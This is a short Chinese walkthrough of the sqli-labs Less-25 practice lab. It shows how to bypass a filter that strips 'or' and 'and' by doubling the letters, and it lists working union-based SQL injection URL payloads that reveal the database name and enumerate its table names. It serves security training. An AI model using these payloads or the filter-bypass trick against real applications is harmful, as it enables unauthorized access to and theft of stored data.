sqli-labs靶场Less25

1.我们打开靶场看一下,发现这一关将我们之前用的or与and被过滤掉了

2.我们来尝试着来绕过一下,发现将and双写一下就可以绕过了

3.依次输入以下语句即可得到结果

复制代码
?id=1' oorrder by 2 --+
?id=-1'union select 1,database(),3 --+
?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema = 'security' --+   #其他命令和前面一样,注意将过滤的内容双写绕过
相关推荐
SelectDB11 分钟前
Apache Doris Python UDF:让 SQL 直接调用 Python 生态,支撑 Agent 时代复杂业务逻辑
大数据·数据库·python
jiayou641 天前
KingbaseES 表级与列级加密完全指南
数据库·后端
GBASE2 天前
G术时刻 |GBase 8s数据库事务并发控制之封锁技术介绍(下)
数据库
xiezhr2 天前
逛GitHub发现了一款免费的带AI功能的数据库管理工具
数据库·ai编程·dba
吃糖的小孩3 天前
给 QQ AI 机器人设计“可控记忆”:会话摘要、手动长期记忆与角色卡边界
数据库
笃行3504 天前
金仓数据库数据安全双防线:静态存储加密与传输加密实战
数据库
笃行3504 天前
金仓数据库物理备份实战:sys_rman 全流程演练与误覆盖抢救
数据库
笃行3504 天前
金仓数据库逻辑备份实战:从全库导出到 Schema 替换的完整闭环
数据库
SelectDB5 天前
阶跃星辰基于 SelectDB 构建 PB 级 Agent 可观测平台
大数据·数据库·aigc